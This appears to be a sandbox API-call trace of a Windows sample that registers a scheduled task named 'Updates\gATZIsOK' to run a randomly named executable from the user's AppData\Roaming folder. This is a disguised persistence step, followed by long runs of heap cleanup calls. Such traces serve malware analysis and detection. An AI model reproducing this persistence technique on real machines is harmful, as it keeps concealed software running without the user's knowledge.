[0184.453] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.454] RtlRestoreLastWin32Error () returned 0x0
[0184.454] GetProcessHeap () returned 0x4920000
[0184.454] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x1fc) returned 0x492ad98
[0184.454] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0184.460] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0184.926] CoCreateInstance (in: rclsid=0x3d26c0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x3d26d0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xdd39c | out: ppv=0xdd39c*=0x283758) returned 0x0
[0185.704] TaskScheduler:ITaskService:Connect (This=0x283758, serverName=0xdd34c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0xdd35c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0xdd36c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0xdd37c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
[0185.749] TaskScheduler:ITaskService:GetFolder (in: This=0x283758, Path=0x0, ppFolder=0xdd464 | out: ppFolder=0xdd464*=0x283880) returned 0x0
[0185.751] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmpda5d.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x12c
[0185.752] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0xdcd7c | out: lpFileSize=0xdcd7c*=1596) returned 1
[0185.752] ReadFile (in: hFile=0x12c, lpBuffer=0xdcd8c, nNumberOfBytesToRead=0x2, lpNumberOfBytesRead=0xdcd88, lpOverlapped=0x0 | out: lpBuffer=0xdcd8c*, lpNumberOfBytesRead=0xdcd88*=0x2, lpOverlapped=0x0) returned 1
[0185.752] SetFilePointer (in: hFile=0x12c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0185.752] malloc (_Size=0x63d) returned 0x2838d0
[0185.752] ReadFile (in: hFile=0x12c, lpBuffer=0x2838d0, nNumberOfBytesToRead=0x63d, lpNumberOfBytesRead=0xdcd88, lpOverlapped=0x0 | out: lpBuffer=0x2838d0*, lpNumberOfBytesRead=0xdcd88*=0x63c, lpOverlapped=0x0) returned 1
[0185.752] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2838d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1597
[0185.752] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2838d0, cbMultiByte=-1, lpWideCharStr=0x493a764, cchWideChar=1597 | out: lpWideCharStr="\n\n \n 2014-10-25T14:27:44.8929027\n XC64ZB\\RDhJ0CNFevzX\n \n \n \n true\n XC64ZB\\RDhJ0CNFevzX\n \n \n false\n \n \n \n \n XC64ZB\\RDhJ0CNFevzX\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe\n \n \n") returned 1597
[0185.752] SysStringLen (param_1="\n\n \n 2014-10-25T14:27:44.8929027\n XC64ZB\\RDhJ0CNFevzX\n \n \n \n true\n XC64ZB\\RDhJ0CNFevzX\n \n \n false\n \n \n \n \n XC64ZB\\RDhJ0CNFevzX\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe\n \n \n") returned 0x63c
[0185.752] VarBstrCat (in: bstrLeft=0x0, bstrRight="\n\n \n 2014-10-25T14:27:44.8929027\n XC64ZB\\RDhJ0CNFevzX\n \n \n \n true\n XC64ZB\\RDhJ0CNFevzX\n \n \n false\n \n \n \n \n XC64ZB\\RDhJ0CNFevzX\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe\n \n \n", pbstrResult=0xdcd2c | out: pbstrResult=0xdcd2c) returned 0x0
[0185.753] free (_Block=0x2838d0)
[0185.753] CloseHandle (hObject=0x12c) returned 1
[0185.754] lstrlenW (lpString="") returned 0
[0185.754] malloc (_Size=0xc) returned 0x283830
[0185.754] SysStringLen (param_1="") returned 0x0
[0185.754] free (_Block=0x283830)
[0185.754] lstrlenW (lpString="") returned 0
[0185.755] ITaskFolder:RegisterTask (in: This=0x283880, Path="Updates\\gATZIsOK", XmlText="\n\n \n 2014-10-25T14:27:44.8929027\n XC64ZB\\RDhJ0CNFevzX\n \n \n \n true\n XC64ZB\\RDhJ0CNFevzX\n \n \n false\n \n \n \n \n XC64ZB\\RDhJ0CNFevzX\n InteractiveToken\n LeastPrivilege\n \n \n \n StopExisting\n false\n true\n false\n true\n false\n \n true\n false\n \n true\n true\n false\n false\n false\n PT0S\n 7\n \n \n \n C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\gATZIsOK.exe\n \n \n", flags=2, UserId=0xdcd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="", varVal2=0x0), password=0xdcd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=0, sddl=0xdcd84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xdcde0 | out: ppTask=0xdcde0*=0x2838d0) returned 0x0
[0187.093] GetProcessHeap () returned 0x4920000
[0187.093] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x14) returned 0x4935168
[0187.093] _memicmp (_Buf1=0x4927368, _Buf2=0x3d2708, _Size=0x7) returned 0
[0187.093] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x492a788, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40
[0187.093] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64
[0187.093] GetProcessHeap () returned 0x4920000
[0187.093] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x82) returned 0x49392a8
[0187.094] _vsnwprintf (in: _Buffer=0xdcdf8, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xdcd94 | out: _Buffer="SUCCESS: The scheduled task \"Updates\\gATZIsOK\" has successfully been created.\n") returned 78
[0187.094] __iob_func () returned 0x76b41208
[0187.094] _fileno (_File=0x76b41228) returned 1
[0187.094] _errno () returned 0x2805b0
[0187.094] _get_osfhandle (_FileHandle=1) returned 0x3c
[0187.094] _errno () returned 0x2805b0
[0187.094] GetFileType (hFile=0x3c) returned 0x2
[0187.094] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c
[0187.094] GetFileType (hFile=0x3c) returned 0x2
[0187.094] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdcd68 | out: lpMode=0xdcd68) returned 1
[0187.184] __iob_func () returned 0x76b41208
[0187.184] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c
[0187.184] lstrlenW (lpString="SUCCESS: The scheduled task \"Updates\\gATZIsOK\" has successfully been created.\n") returned 78
[0187.185] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdcdf8*, nNumberOfCharsToWrite=0x4e, lpNumberOfCharsWritten=0xdcd8c, lpReserved=0x0 | out: lpBuffer=0xdcdf8*, lpNumberOfCharsWritten=0xdcd8c*=0x4e) returned 1
[0187.309] IUnknown:Release (This=0x2838d0) returned 0x0
[0187.309] TaskScheduler:IUnknown:Release (This=0x283880) returned 0x0
[0187.309] TaskScheduler:IUnknown:Release (This=0x283758) returned 0x0
[0187.309] lstrlenW (lpString="") returned 0
[0187.309] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0187.309] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53
[0187.309] GetProcessHeap () returned 0x4920000
[0187.309] GetProcessHeap () returned 0x4920000
[0187.309] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x492ad98) returned 1
[0187.309] GetProcessHeap () returned 0x4920000
[0187.310] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x492ad98) returned 0x1fc
[0187.310] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x492ad98) returned 1
[0187.310] GetProcessHeap () returned 0x4920000
[0187.310] GetProcessHeap () returned 0x4920000
[0187.310] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926a48) returned 1
[0187.310] GetProcessHeap () returned 0x4920000
[0187.310] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926a48) returned 0x6a
[0187.310] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926a48) returned 1
[0187.310] GetProcessHeap () returned 0x4920000
[0187.310] GetProcessHeap () returned 0x4920000
[0187.311] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929478) returned 1
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929478) returned 0x16
[0187.311] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929478) returned 1
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x492abb8) returned 1
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x492abb8) returned 0x10
[0187.311] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x492abb8) returned 1
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929598) returned 1
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929598) returned 0x14
[0187.311] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929598) returned 1
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4928ee0) returned 1
[0187.311] GetProcessHeap () returned 0x4920000
[0187.311] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4928ee0) returned 0xa0
[0187.312] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4928ee0) returned 1
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49273f8) returned 1
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49273f8) returned 0x10
[0187.312] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49273f8) returned 1
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929658) returned 1
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929658) returned 0x14
[0187.312] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929658) returned 1
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49269d0) returned 1
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49269d0) returned 0x6e
[0187.312] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49269d0) returned 1
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x492aa08) returned 1
[0187.312] GetProcessHeap () returned 0x4920000
[0187.312] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x492aa08) returned 0x10
[0187.313] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x492aa08) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929378) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929378) returned 0x14
[0187.313] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929378) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927380) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4927380) returned 0xc
[0187.313] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4927380) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927440) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4927440) returned 0x10
[0187.313] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4927440) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929338) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929338) returned 0x14
[0187.313] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929338) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4928cd0) returned 1
[0187.313] GetProcessHeap () returned 0x4920000
[0187.313] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4928cd0) returned 0x208
[0187.314] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4928cd0) returned 1
[0187.314] GetProcessHeap () returned 0x4920000
[0187.314] GetProcessHeap () returned 0x4920000
[0187.314] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927398) returned 1
[0187.314] GetProcessHeap () returned 0x4920000
[0187.314] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4927398) returned 0x10
[0187.314] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4927398) returned 1
[0187.314] GetProcessHeap () returned 0x4920000
[0187.314] GetProcessHeap () returned 0x4920000
[0187.314] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49294d8) returned 1
[0187.314] GetProcessHeap () returned 0x4920000
[0187.314] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49294d8) returned 0x14
[0187.314] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49294d8) returned 1
[0187.314] GetProcessHeap () returned 0x4920000
[0187.314] GetProcessHeap () returned 0x4920000
[0187.314] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x492a788) returned 1
[0187.314] GetProcessHeap () returned 0x4920000
[0187.314] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x492a788) returned 0x200
[0187.315] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x492a788) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927368) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4927368) returned 0x10
[0187.315] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4927368) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929678) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929678) returned 0x14
[0187.315] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929678) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49295b8) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49295b8) returned 0x14
[0187.315] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49295b8) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927410) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4927410) returned 0x10
[0187.315] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4927410) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4922778) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.315] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4922778) returned 0x14
[0187.315] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4922778) returned 1
[0187.315] GetProcessHeap () returned 0x4920000
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929698) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929698) returned 0x16
[0187.316] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929698) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49273c8) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49273c8) returned 0x10
[0187.316] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49273c8) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926608) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926608) returned 0x14
[0187.316] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926608) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4920598) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4920598) returned 0x2
[0187.316] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4920598) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926e38) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926e38) returned 0x14
[0187.316] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926e38) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926c00) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.316] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926c00) returned 0x14
[0187.316] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926c00) returned 1
[0187.316] GetProcessHeap () returned 0x4920000
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926c20) returned 1
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926c20) returned 0x14
[0187.317] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926c20) returned 1
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926c40) returned 1
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926c40) returned 0x14
[0187.317] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926c40) returned 1
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4929398) returned 1
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4929398) returned 0x14
[0187.317] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4929398) returned 1
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49293d8) returned 1
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49293d8) returned 0x14
[0187.317] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49293d8) returned 1
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4922580) returned 1
[0187.317] GetProcessHeap () returned 0x4920000
[0187.317] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4922580) returned 0x30
[0187.318] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4922580) returned 1
[0187.318] GetProcessHeap () returned 0x4920000
[0187.318] GetProcessHeap () returned 0x4920000
[0187.318] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49293f8) returned 1
[0187.318] GetProcessHeap () returned 0x4920000
[0187.318] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49293f8) returned 0x14
[0187.318] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49293f8) returned 1
[0187.318] GetProcessHeap () returned 0x4920000
[0187.318] GetProcessHeap () returned 0x4920000
[0187.318] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4928f88) returned 1
[0187.318] GetProcessHeap () returned 0x4920000
[0187.318] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4928f88) returned 0x30
[0187.318] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4928f88) returned 1
[0187.318] GetProcessHeap () returned 0x4920000
[0187.318] GetProcessHeap () returned 0x4920000
[0187.318] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49296d8) returned 1
[0187.318] GetProcessHeap () returned 0x4920000
[0187.318] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49296d8) returned 0x14
[0187.319] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49296d8) returned 1
[0187.319] GetProcessHeap () returned 0x4920000
[0187.319] GetProcessHeap () returned 0x4920000
[0187.319] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x49392a8) returned 1
[0187.319] GetProcessHeap () returned 0x4920000
[0187.319] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x49392a8) returned 0x82
[0187.319] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x49392a8) returned 1
[0187.319] GetProcessHeap () returned 0x4920000
[0187.319] GetProcessHeap () returned 0x4920000
[0187.319] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4935168) returned 1
[0187.319] GetProcessHeap () returned 0x4920000
[0187.319] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4935168) returned 0x14
[0187.319] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4935168) returned 1
[0187.319] GetProcessHeap () returned 0x4920000
[0187.319] GetProcessHeap () returned 0x4920000
[0187.319] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4927428) returned 1
[0187.319] GetProcessHeap () returned 0x4920000
[0187.319] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4927428) returned 0x10
[0187.320] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4927428) returned 1
[0187.320] GetProcessHeap () returned 0x4920000
[0187.320] GetProcessHeap () returned 0x4920000
[0187.320] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926830) returned 1
[0187.320] GetProcessHeap () returned 0x4920000
[0187.320] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926830) returned 0x14
[0187.320] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926830) returned 1
[0187.320] GetProcessHeap () returned 0x4920000
[0187.320] GetProcessHeap () returned 0x4920000
[0187.320] HeapValidate (hHeap=0x4920000, dwFlags=0x0, lpMem=0x4926850) returned 1
[0187.320] GetProcessHeap () returned 0x4920000
[0187.320] RtlSizeHeap (HeapHandle=0x4920000, Flags=0x0, MemoryPointer=0x4926850) returned 0x14
[0187.320] RtlFreeHeap (HeapHandle=0x4920000, Flags=0x0, BaseAddress=0x4926850) returned 1
[0187.320] GetProcessHeap () returned 0x4920000
[0187.320] GetProcessHeap () returned 0x4920000
